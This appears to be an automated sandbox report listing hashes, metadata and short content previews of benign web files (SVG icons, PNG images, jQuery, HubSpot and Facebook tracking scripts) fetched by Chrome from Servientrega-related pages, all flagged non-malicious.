            URL:https://connect.facebook.net/signals/config/999069541179688?v=2.9.168&r=stable&domain=www.servientrega.com&hme=3ba426d944c98eb3ce406a0f93fc097d0320a486b65b445a33b2eda3a5aa3429&ex_m=70%2C119%2C105%2C109%2C61%2C4%2C98%2C69%2C16%2C95%2C87%2C51%2C54%2C170%2C173%2C185%2C181%2C182%2C184%2C29%2C99%2C53%2C76%2C183%2C165%2C168%2C178%2C179%2C186%2C129%2C41%2C34%2C141%2C15%2C50%2C192%2C191%2C131%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C91%2C17%2C14%2C94%2C90%2C89%2C106%2C52%2C108%2C39%2C107%2C30%2C92%2C26%2C166%2C169%2C138%2C28%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C74%2C100%2C27%2C75%2C9%2C8%2C79%2C48%2C21%2C102%2C101%2C103%2C96%2C10%2C20%2C3%2C38%2C19%2C84%2C56%2C82%2C33%2C73%2C0%2C93%2C32%2C81%2C86%2C47%2C46%2C85%2C37%2C5%2C88%2C80%2C44%2C35%2C83%2C2%2C36%2C63%2C42%2C104%2C45%2C78%2C68%2C110%2C60%2C59%2C31%2C97%2C58%2C55%2C49%2C77%2C72%2C24%2C111%2C198%2C197%2C199%2C204%2C205%2C206%2C202%2C194%2C130%2C132%2C161%2C193%2C195%2C120%2C155%2C143%2C149%2C187%2C188%2C127%2C230%2C114%2C124%2C125%2C231%2C163%2C117%2C233%2C164%2C134%2C121%2C152%2C146%2C112
            Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:dropped
            Size (bytes):3857
            Entropy (8bit):4.5794716462664375
            Encrypted:false
            SSDEEP:96:xH/UhQQqOcGPFVAduL8UY/2rBHxY7XcXyicxAthTD+65w:tRgJFY/2rBxYTmyGCb
            MD5:DA43438BED46DFC10A9800655577228D
            SHA1:65EB7A45B4B0A62E53970EAC81096A275C5C4D70
            SHA-256:692AD46320BE0ABCB5805CB3032F22B21DACE9EE1DC5819CA6184D5EA6672201
            SHA-512:B3FF64B712F976F3530F0BCB1BF30B8E544A64BFCC195EEA76643207B7FB30279146E39914B95A2A8EE1F843D57519F0EAB298178DAC836A7A6BFF49E4A5493E
            Malicious:false
            Reputation:low
            Preview:<?xml version="1.0" encoding="utf-8"?>..<svg width="23px" height="23px" viewBox="0 0 23 23" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg">.. <defs>.. <linearGradient x1="0.777364" y1="0.086554565" x2="0.07414896" y2="1" id="gradient_1">.. <stop offset="0" stop-color="#9039A6" />.. <stop offset="0.45807952" stop-color="#DC376F" />.. <stop offset="1" stop-color="#FA9126" />.. </linearGradient>.. <linearGradient x1="1.5520687" y1="-0.6829178" x2="0.07414896" y2="1" id="gradient_2">.. <stop offset="0" stop-color="#9039A6" />.. <stop offset="0.45807952" stop-color="#DC376F" />.. <stop offset="1" stop-color="#FA9126" />.. </linearGradient>.. </defs>.. <g id="instagram-(3)" opacity="0.90000004">.. <path d="M22.9415 6.76208C22.8877 5.54 22.69 4.69983 22.4068 3.97181C22.1147 3.19904 21.6653 2.50717 21.0766 1.93202C20.5013 1.34792 19.8047 0.894053 19.0408 0.606566C18.3084 0.323467 17.4725 0.125841 16.25
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:PNG image data, 1000 x 795, 8-bit colormap, non-interlaced
            Category:downloaded
            Size (bytes):116263
            Entropy (8bit):7.980667893775942
            Encrypted:false
            SSDEEP:3072:lk3+lcSZUzNQYXVJxtT/Q/p97SF07EPJHssCApYBE:uycSZMNQm78x9717mHsseE
            MD5:37C37EFC36F1D521902B3D14A9F2F943
            SHA1:6087CE1B9B1ADB58DD0F952821A26BC74369A642
            SHA-256:46FBD89826A81DE3FAB251B3D4BC84C6FD55A2014CDA483253E87E55BC8D5BB4
            SHA-512:049117A8999E219441FBFAB59FE5622A17D5ACFCBE9734C883576DDBFEEF27974075CEFC18C95DF5B2DD4D6B2FDBC51FD2DD4ACED1AD7176ECBCA643404658BC
            Malicious:false
            Reputation:low
            URL:https://uzer.co/images/port4-m.png
            Preview:.PNG........IHDR..............{Oa....PLTE..K..V..Q..O........T..X..V..U..J.....S.....N..O..J..Q.....R..L.....P..M..M..L........O......$.U..M..L..\..R..N.....H.....G..F.....P..D..I.....?..C..<......-.Y648-&3..B...........A..;..@...........=.....:........Iecg>FF......*.`..N..............?......:.m..%u.......m..llk..J...{........z..J....)4.B8N.LLL..........8yyyJ-.....WWX...........&^7...`__/...]....=#....7B..s.H.rqr6.`.....2.ELX7&o..8?..........Da.......<........!.e.....}.......o+R.}att...qO...>.\ZkkC.q..D...{...eD..i..+.R9.OW.Y;...Q..zV..;.yp..l.....[L._j..MCX........o.............j....].....d...1cM8....x.I.[b...qD-..........1........zd#.]W.q.iU|.S}...gn;u8.u..[.`zD.rj....W..n..N.......S..En......I..H....o.n.i)H.S.!....RS....j6~..t..;......R.........&....tRNS.....{.....IDATx...n. .D.<.E....6..=b.S'.1......OG....~/--.7"5.+..^.Ss./|...>.Eo....Y...}t..l..o...#CU?.....z...L&.A..D%.\....i....*7..W*..Qy.]...]..!..27u....~_.K...o,\#3.
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:downloaded
            Size (bytes):7554
            Entropy (8bit):4.25286042320199
            Encrypted:false
            SSDEEP:96:qr2/y973KnJhS88DzdDEKNbDjRhLuKXjvZyHgfOGuyZggO1/LyMzfFg:zqKnJwdDbNHNhLlyHgfDuy5O1DzO
            MD5:4821E2548D62B3D5471964A2C64E2C7F
            SHA1:0D44C292A43018684455C13091101EB4EED81064
            SHA-256:0DAFA4836AE2BEDCAF30433F83A1D551EC66B3E692DB8FB83F764A7DD30231DA
            SHA-512:3BDE4C7A827B8B19EF97D3B7657ABA79D511A65EE01AD2893F11BB513C332FA1596E8DBA66B2B077F7D50376033045E1140E61FCC16B1EA95FCBB524842D35AC
            Malicious:false
            Reputation:low
            URL:https://www.servientrega.com/wps/contenthandler/!ut/p/digest!dWYvvbhKekcZQKtCvzyVng/dav/fs-type1/themes/New-Theme-Servientrega/images/svg/ico-ecommerce.svg
            Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg width="43px" height="30px" viewBox="0 0 43 30" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. <title>Group 28</title>. <g id="Plantilla-1---Menus-desplegados" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">. <g id="Menu-Soluciones" transform="translate(-834.000000, -126.000000)">. <g id="Group-28" transform="translate(834.000000, 126.000000)">. <rect id="Rectangle" fill="#FFFFFF" opacity="0" x="0" y="0" width="43" height="30"></rect>. <g id="Group-8" transform="translate(0.000000, 6.893769)">. <path d="M14.2376106,11.6381261 L9.14128659,11.6381261 L8.58764087,9.4279342 L14.965222,9.4279342 L14.2376106,11.6381261 Z M15.8737577,8.77688002 C15.795908,8.66902335 15.6710877,8.5990035 15.5380039,8.5990035 L8.5084865,8.5990035 C8.46543,8.5990035 8.42454807,8.6137903 8.38497088,8.62596767 L8.18186597,7.81095396 C8.13
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:dropped
            Size (bytes):2075
            Entropy (8bit):4.841220551602856
            Encrypted:false
            SSDEEP:48:cUjTtm/HPYay5Bb1qFWvgiwT7CWvQ8uOnwkB9qZVe:xHEvE5F1qiICWvQ8rZqLe
            MD5:E30057AED282B66FE4EB51017B20E1B1
            SHA1:C121EB49AF5954666B8DC2B505F4CA83C36D34A1
            SHA-256:F56965B808E2681B1CC8E53270AECA700084404A3A210C0FF9247392EA34B935
            SHA-512:E452B11E6E8A957BC5754F5F751DB9936CC23A23C7CE8DD8885F36CA832E2299D860F21C1E2685E1B69BB7A46B16BFCF5A7E5EF7010A41D91AC38FC24168E263
            Malicious:false
            Reputation:low
            Preview:<?xml version="1.0" encoding="utf-8"?>..<svg width="23px" height="23px" viewBox="0 0 23 23" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg">.. <defs>.. <filter id="filter_1">.. <feColorMatrix in="SourceGraphic" type="matrix" values="0 0 0 0 1 0 0 0 0 1 0 0 0 0 1 0 0 0 1 0" />.. </filter>.. <path d="M11.5 23C17.8513 23 23 17.8513 23 11.5C23 5.14873 17.8513 0 11.5 0C5.14873 0 0 5.14873 0 11.5C0 17.8513 5.14873 23 11.5 23Z" id="path_1" />.. <clipPath id="mask_1">.. <use xlink:href="#path_1" />.. </clipPath>.. </defs>.. <g id="facebook-(1)">.. <path d="M11.5 23C17.8513 23 23 17.8513 23 11.5C23 5.14873 17.8513 0 11.5 0C5.14873 0 0 5.14873 0 11.5C0 17.8513 5.14873 23 11.5 23Z" id="Mask" fill="#1977F2" fill-rule="evenodd" stroke="none" />.. <g clip-path="url(#mask_1)">.. <g id="facebook-(1)" transform="translate(6.708313 5.75)" filter="url(#filter_1)">.. <path d="M2.38979 9.75582C2.33005 9.75582 1.01566
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (65447)
            Category:dropped
            Size (bytes):89501
            Entropy (8bit):5.289893677458563
            Encrypted:false
            SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
            MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
            SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
            SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
            SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
            Malicious:false
            Reputation:low
            Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:PNG image data, 1000 x 795, 8-bit/color RGBA, non-interlaced
            Category:downloaded
            Size (bytes):479877
            Entropy (8bit):7.988997495003278
            Encrypted:false
            SSDEEP:12288:W5eky6tPc0gpiMoLQCZq7khZtqLM7Etk7Eg1lbdZKGeTo3hZPszU:oekycPc0gp2N0AILM7EtoK2fPz
            MD5:54801C49898DED3C410FAE042E7BF1D4
            SHA1:ED39A4480CF1BD9E42102B18CE81E87595B92006
            SHA-256:44F09307A4AD95167D6A219ACEBAAAF952036125B06009D20B32801422E369E0
            SHA-512:AEF900F5B36BA95490A2760D21B3125666DA9219E5ADBD4F3831932C96ADFEAB13CBB5A59F198F60C3B15B4D2C103AE73AA30EB05258EDE68B7E5DC98D386AD3
            Malicious:false
            Reputation:low
            URL:https://uzer.co/images/port6-m.png
            Preview:.PNG........IHDR...............S....pHYs.................sRGB.........gAMA......a...R.IDATx.....+In-..\._._......f.7K..{%)Yu.A......`..........~....s._....|....k...k].c?.<.._..5..<....g.Z..\../...(..C...Z...|.Z..#...X.w........!c..t..R..%...?.\>...v90I.5/c.{P^.y.../8.t..fZ.....sjd..0.y....=6...7.._...%.u.6y....cm.z..<...<....=....Or.{#Y.D.~.....?.....?ZK...5..f.1...o...P.}......,]....s7..f.C#.....f.q...9.I,........g..yl..~.z....r...U0..m>K.k..p..}0.F..{]4.....1...\......K.....T....c.a.g.+.7..6.......`4a..|9.9...m.k...^.s..H...G0.......B.8....H..0.....X%5..g.7...s~...p%...c.....=?.H..S.Z..X>i.....;.m.R....~.`d.q...~.$|..a.o.Kp..n. c.x........`...AQ,1.0~.2;....Z..{i.r..#%2......e...".O.x.e.t...[......./.....%uJ.l.......E..U.9...|>.?.fL.......-..w..y.%...Uv.r]...{..?.?....i.,.-...Ij....X}a@.$.0@.5..,..@nB:.....c.@..H9...@R...:...P)0...}.....t.)j.=.$..$.v.N.1X_[..<B..!....l.2..e.+.T./:...c~;..S.s.\/........A]E....>=2.....=k..#..x...z
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:PNG image data, 900 x 482, 8-bit/color RGBA, non-interlaced
            Category:dropped
            Size (bytes):37211
            Entropy (8bit):7.954245548607627
            Encrypted:false
            SSDEEP:768:hfhyU2sDDghq02jKM7H+hMb62XMmklDSuZX98O07ZLRmO+:d7ghl2jKM7b2ghk5COEmO+
            MD5:578604820692480DD8A6DAF62097CFEC
            SHA1:6546DC134A796A92CD02A36D7430E1F7F9165DB0
            SHA-256:0C652DC2D20990C76084E1B04649754BC3EF08BA102731E0B952C5F53EB2495B
            SHA-512:7BFBF57BF0D00B8B5ADE5E97B23446F585B9B2E2149463B3DF51FB7EE525B29DE8AC4B696953F7EFFDC0EFA31018D3CC3E5B7DD0E89705107717B742B7D15A53
            Malicious:false
            Reputation:low
            Preview:.PNG........IHDR..............|.U....tEXtSoftware.Adobe ImageReadyq.e<....IDATx....|.e....I.." ^.....Z. (E`.X..O..<(.*...........RZ......*J.(.x@Q.]E@@h.4...$.......$..y=.I.d..I...<.R......................................................................................................................................................................................................@.i.....H.c._&.J.CJ...)..,.ZWPC .".....%.^R.....X.s6.?K).R*......~....@....2.|......?..S._........+....i..k..6m.,..|3$.~O.@.t..G.d...R.....R.KyVJqii.Rj...x0.6........`..#d.._^^.B...<VB..o...QG.errr.....{......CM.@.T..Cer........W......%.G...r......\...7.I...0..5k.{..............@@u..I..3.....J....Q....a.!.\...I.>..O.?../[{.l ...l...>R*....B7,\.0D......`....-....+...m.._.~....../._......,....q{O.:U.;WUWWG..aC..7.......y............1..._VV....`.H6....+U.............a.......t.M.$.E.;.c.a..o..>..?C..Z.a.1....I....~..r.x....G.r.Yg....[.9.R..R%..'.H..`w..NNN.O^.:)....\C
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (6760)
            Category:dropped
            Size (bytes):6802
            Entropy (8bit):5.16048074014383
            Encrypted:false
            SSDEEP:192:V9tHlqcSmxTtfx7PMuFjsGft5fXPoJCGIrHP5OBhuXwhm:vrqcdxTtfrFjsGft53mCGIrHP5OBhuXJ
            MD5:E26B6D168D57B6205F7BA581B21E3DE8
            SHA1:ED1AFE8F4DDCF4ADF3E572E7E63EB3F75755742A
            SHA-256:9CECDA2749DEB063CCDA4CB1F655F8CEA6BAF8140071B53EC7804314216A7170
            SHA-512:EDFB4AA7D38EF583A53EED21C997B514D42D3AEACE75970B4437CBF7A8D73B5038392A2315095ED9F7ED09FA9743532FC7FE8B46164D53E57C7B34A60FD7494F
            Malicious:false
            Reputation:low
            Preview:var _extends=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var o in n)Object.prototype.hasOwnProperty.call(n,o)&&(t[o]=n[o])}return t},_typeof="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t};!function(t,e){"object"===("undefined"==typeof exports?"undefined":_typeof(exports))&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):t.LazyLoad=e()}(this,function(){"use strict";function t(t,e,n){return!(u(t,e,n)||_(t,e,n)||f(t,e,n)||h(t,e,n))}function e(t,e,n){var o=e._settings;!n&&r(t)||(C(o.callback_enter,t),R.indexOf(t.tagName)>-1&&(x(t,e),y(t,o.class_loading)),H(t,e),s(t),C(o.callback_set,t))}var n=function(){return{elements_selector:"img",container:window,threshold:300,throttle:150,data_src:"src",data_srcset:"srcset",data_sizes:"sizes",data_bg:"bg",class_l
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (64667)
            Category:dropped
            Size (bytes):70155
            Entropy (8bit):5.298357028582105
            Encrypted:false
            SSDEEP:1536:bvv9kTaEcNsVonZXYNtWuNscVDXYRClzlIgQXyjXlkaioEFWOqDw6usT5aXsdtkL:mNDNLlzlIgQX28XsYce
            MD5:B4653F3D9E2A19AB2398E865A6C51082
            SHA1:E6EA2F0FD9A7EF8F2D07E790EC60E01F53CA9A53
            SHA-256:94F21A088982EFEFCE534C134C3082AF7CB7B73F58839DC02C70ACC8EE1C3DF0
            SHA-512:B4B92EF68CF1D0D7D2B91CEEBE9047ED2DF1096AF327B7FBE2C224EF04596E2269C4F443DC8EDCF12BFE8606E15CC20545AAEFE9BF63222227E5F219510BE697
            Malicious:false
            Reputation:low
            Preview:/** . * HubSpot Analytics Tracking Code Build Number 1.981. * Copyright 2024 HubSpot, Inc. http://www.hubspot.com. */.var _hsq = _hsq || [];._hsq.push(['setTrackingGate', 'AnalyticsTracking:BlockBadIdentities']);._hsq.push(['setPortalId', 22144436]);._hsq.push(['trackPageView']);._hsq.push(['setLegacy', false]);._hsq.push(['addHashedCookieDomain', '224894981']);._hsq.push(['addHashedCookieDomain', '20629287']);._hsq.push(['addHashedCookieDomain', '251652889']);._hsq.push(['addHashedCookieDomain', '146685547']);._hsq.push(['addHashedCookieDomain', '212638539']);._hsq.push(['embedHubSpotScript', 'https://js-na1.hs-scripts.com/22144436.js', 'hs-script-loader']);._hsq.push(['initEventVisualizerScript']);._hsq.push(['setTrackingDomain', 'track.hubspot.com']);./** _anon_wrapper_ **/ (function() {./*! For license information please see hsa-prod.js.LICENSE.txt */.(hstc=hstc||{}).JS_VERSION=1.1;hstc.ANALYTICS_HOST="track.hubspot.com";(hstc=hstc||{}).Math={uuid:function(){if(window.navigator.us
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:PNG image data, 600 x 360, 8-bit/color RGB, non-interlaced
            Category:dropped
            Size (bytes):67735
            Entropy (8bit):7.99362594138623
            Encrypted:true
            SSDEEP:1536:s22rWZdwqXfU+6zy5Vb/kcBOFbRUDE+aItYq6lLqOff:s22SZdwgfUBm58J6DE+Lyq6lGA
            MD5:0ADE999AD0B41A855F125E508D32EA0B
            SHA1:00DAEE6AADE4662005587AC0C111B30305357E51
            SHA-256:1D11FAA982515471AA792DAF561B196EECB4561B42137CA20C79F66F0CA937BB
            SHA-512:7F8A4126D25A1A81A9C56651DCDC64ED18680D68A62B5DCE569863153A9D5783C8199CD5433FF8D71D5FFB7B0ED2A8149A426E76048027B2FB7357D380FEEB61
            Malicious:false
            Reputation:low
            Preview:.PNG........IHDR...X...h.............tEXtSoftware.Adobe ImageReadyq.e<...$iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.98d7942, 2022/03/21-11:40:59 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:22E7F55C991911EE8D36F3C02A9F2D0A" xmpMM:InstanceID="xmp.iid:22E7F55B991911EE8D36F3C02A9F2D0A" xmp:CreatorTool="Adobe Photoshop 22.5 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:CA489C81990A11EEAA45D698A28D96E0" stRef:documentID="xmp.did:CA489C82990A11EEAA45D698A28D96E0"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..k.....IDATx..].`.......:.....{o.`.;.8..jB..&...~ ....1%Tc.1......E.V.....g...Y:.}.N.|...^..}.{o^..$............
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:dropped
            Size (bytes):13939
            Entropy (8bit):4.674263072989602
            Encrypted:false
            SSDEEP:192:85QCVUL98q23z2yv0U1bHCZ5l2dgW340hZKOfFtUBbyVcBxMZr6iAOuE5Gt:8LyyZHCZ5l2dn340hX9oxMZr7AOuE5Gt
            MD5:BE3DE397B91CC4C1B0F80675727B8895
            SHA1:494319C0BEDAEA38986B69DE68FFB17EF5BAB91F
            SHA-256:A5F2180E3F00E486D08D6266503EDDBE5670C03A119DA66FA824CC988001964F
            SHA-512:0D58FB314788CA586842595AC0148056AE04272E2D0E27632584722B799DE9473C60E49CB324C77B130BBE2C3CA2C064044933F0577F0AE69C7C55F2328662AB
            Malicious:false
            Reputation:low
            Preview:<?xml version="1.0" encoding="utf-8"?>..<svg width="23px" height="16px" viewBox="0 0 23 16" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg">.. <g id="ecuador">.. <path d="M0 2.04198C0 2.99202 0.771174 3.76221 1.72253 3.76221L21.2775 3.76221C22.2288 3.76221 23 2.99206 23 2.04198L23 0L0 0L0 2.04198Z" transform="translate(0 11.286621)" id="Path" fill="#FF4B55" stroke="none" />.. <path d="M21.2775 0L1.72253 0C0.771174 0 0 0.770144 0 1.72023L0 7.52441L23 7.52441L23 1.72023C23 0.770144 22.2288 0 21.2775 0Z" id="Path" fill="#FFE15A" stroke="none" />.. <path d="M0 0L23 0L23 3.76212L0 3.76212L0 0Z" transform="translate(0 7.524414)" id="Rectangle" fill="#41479B" stroke="none" />.. <path d="M0 2.47943L2.89656 0L2.89656 3.58837C2.89656 4.19315 2.40561 4.68336 1.80011 4.68336L1.80011 4.68336C1.52923 4.68336 1.26792 4.58322 1.06658 4.4023L0 3.44369L0 2.47943L0 2.47943Z" transform="translate(11.0859375 5.267212)" id="Path" fill="#FFE15A" stroke
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:PNG image data, 1800 x 1431, 8-bit/color RGBA, non-interlaced
            Category:downloaded
            Size (bytes):1585753
            Entropy (8bit):7.972672836196627
            Encrypted:false
            SSDEEP:49152:v6BbQ9U0EX51vwt7jQobpa82XoWo+STF70b:v6hQ9U5X5hwt/QobpkXoFob
            MD5:E16EED00DDBB3B43297368A5AFFBECB2
            SHA1:1E00C9C98FC9EDFAD312A616B114748DDE5E391F
            SHA-256:CB7D2868F5FF1432F8E4FDC1BA6C52A1E2083F1C258DF3E23CBA541B2566FFEC
            SHA-512:170E43AE2437C3C947A349351744D2754186B17D55AE30ACC2BB9FAF31CDB1F9181BFC21EBF62D5E66E89C6F616CCF522C6FD18323CCA633EA0E4088D9668406
            Malicious:false
            Reputation:low
            URL:https://uzer.co/images/port7.png
            Preview:.PNG........IHDR.............S< 9....pHYs.................sRGB.........gAMA......a...1.IDATx...b$7.4..a.....FxV...0.%...*.[U.\.E.$....3.@..LD|}.^.u......u#..^i......._Sp...5......K.z..K$.}u..q.._o.......mr.\...d.y.G.Z.N...u.....r.a...2.u]......./CO..{z{.....{.}M..q.t.,7.c.A..l.... <..g..KL.&.>....7..m.?..|.d.......5...........o...{.......s..8.z..q....+...t....}Z:.E..w..l.Z0....vo....s...Uj..."....g.i....H.^`,.(......5.Bc..Q.-.t.FB......-ty..)..T].`.dq.3......<.........V.7....4.w._V\.Li^..K.......g.S..*....I,-W..Ly.fI...)5yy.....Fv0.,)"....xV..l..P..?..w..=.?)p..k.F..u.6..V.[..uE.r.2.Rog......T.'^..9..G....-......Y.4....7..h.........d.p.Z.2U9.p..W7....f0.Rv.ov..='..........>N{.B$*....n..kv...5.O..?...1..........C..-&5^...._.W..Ia3($+...{..Kp.Y._6.WG...=..0.........n.?....aOsx..@u.d;..}-....*a.v............:..Vs[M.^H.....7R...P.g6......Q.../^.?Y.........\n....o...Uq..?.b@.dN......3....P=...h....,.D. .....;.....N....&...b.._.7f.....R..DS...
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:downloaded
            Size (bytes):1450
            Entropy (8bit):5.015913032797666
            Encrypted:false
            SSDEEP:24:2dUnjTxJ24apEvD41d02MwOd0vDtDDOOaFYb4apEvD41dEDZAMwOdaQGwyo6pUiK:cUjTVMvpDyOaJ0pLHvqX
            MD5:861946EDCA51B5DD1F3319A35D4CD17E
            SHA1:143DB14A398ED5B1AC71475C5C67142A595C5E88
            SHA-256:9583D70C1382D43CCAE85F3DDEDE41C68AEB67F377FF963D22EB2F8B407EF92C
            SHA-512:D66C8E644B955A7B91CD86B545CB1994642BA85C8B3F3B8070427D12FDFD3AD3B49B77BED45D987E985F12CF1EC07C6CC8D671D3E3882A1DD666452FE9FB4474
            Malicious:false
            Reputation:low
            URL:https://qdjtq.com/modify/layout/images/67.svg
            Preview:<?xml version="1.0" encoding="utf-8"?>..<svg width="23px" height="23px" viewBox="0 0 23 23" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg">.. <g id="Group-23">.. <path d="M11.5 23C17.8513 23 23 17.8513 23 11.5C23 5.14873 17.8513 0 11.5 0C5.14873 0 0 5.14873 0 11.5C0 17.8513 5.14873 23 11.5 23Z" id="Oval" fill="#BFBFBF" fill-rule="evenodd" stroke="none" />.. <g id="youtube-(1)" transform="translate(4.791687 6.708252)">.. <path d="M10.8843 0L2.5324 0C1.12365 0 0 1.19834 0 2.66101L0 7.40149C0 8.88179 1.14042 10.0625 2.5324 10.0625L10.8843 10.0625C12.293 10.0625 13.4167 8.86416 13.4167 7.40149L13.4167 2.66101C13.4167 1.19834 12.2763 0 10.8843 0ZM4.9474 7.20764L4.9474 2.87248L8.46927 5.04006L4.9474 7.20764Z" id="Icon_23_" fill="#FFFFFF" stroke="none" />.. </g>.. <path d="M11.5 23C17.8513 23 23 17.8513 23 11.5C23 5.14873 17.8513 0 11.5 0C5.14873 0 0 5.14873 0 11.5C0 17.8513 5.14873 23 11.5 23Z" id="Oval-Copy" fill="#FF0000" fill-
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:downloaded
            Size (bytes):8357
            Entropy (8bit):4.726446810395012
            Encrypted:false
            SSDEEP:192:O+KjZIPCbIozbsTCySpxK3aAX7MYcHgVW1+fm:OnXyi6aIwdUW1+u
            MD5:6F6C51CB2AA4BC332004FF9FAE3C906E
            SHA1:5E7F28CD85D1C87F2E47B9E7B6ABCC1AA34D850A
            SHA-256:32A1C04A6D5B10F5877EE69208ADF04A9210C0C44D97F961F334CF5C2BFE63E3
            SHA-512:615B0E83E539D62370A46529CE23BDF6AE07C2EE561E8652A13EB34F1D06C9700FB4CBA3FF52C9DC8D3C45AA5FF2587CD7E4E0E5EAB457A12ADF96E33FBAF572
            Malicious:false
            Reputation:low
            URL:https://www.servientrega.com/wps/contenthandler/!ut/p/digest!dWYvvbhKekcZQKtCvzyVng/dav/fs-type1/themes/New-Theme-Servientrega/images/svg/logo-servientrega-gris.svg
            Preview:<?xml version="1.0" encoding="utf-8"?>. Generator: Adobe Illustrator 25.0.1, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->.<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px".. viewBox="0 0 218 38" style="enable-background:new 0 0 218 38;" xml:space="preserve">.<style type="text/css">...st0{fill:url(#Path_6_);stroke:#FFFFFF;stroke-width:2.16;}...st1{fill:url(#Path_7_);}...st2{fill:#FFFFFF;}...st3{fill:url(#Path_8_);}...st4{fill:#97999B;}.</style>.<g id="Symbols">..<g id="Footer" transform="translate(-98.000000, -74.000000)">...<g id="Logo-nuevo" transform="translate(100.000000, 76.000000)">....<g id="Group-4">...........<linearGradient id="Path_6_" gradientUnits="userSpaceOnUse" x1="-183.9874" y1="425.0515" x2="-183.956" y2="426.081" gradientTransform="matrix(33.826 0 0 -34 6238.9487 14486.252)">......<stop offset="0" 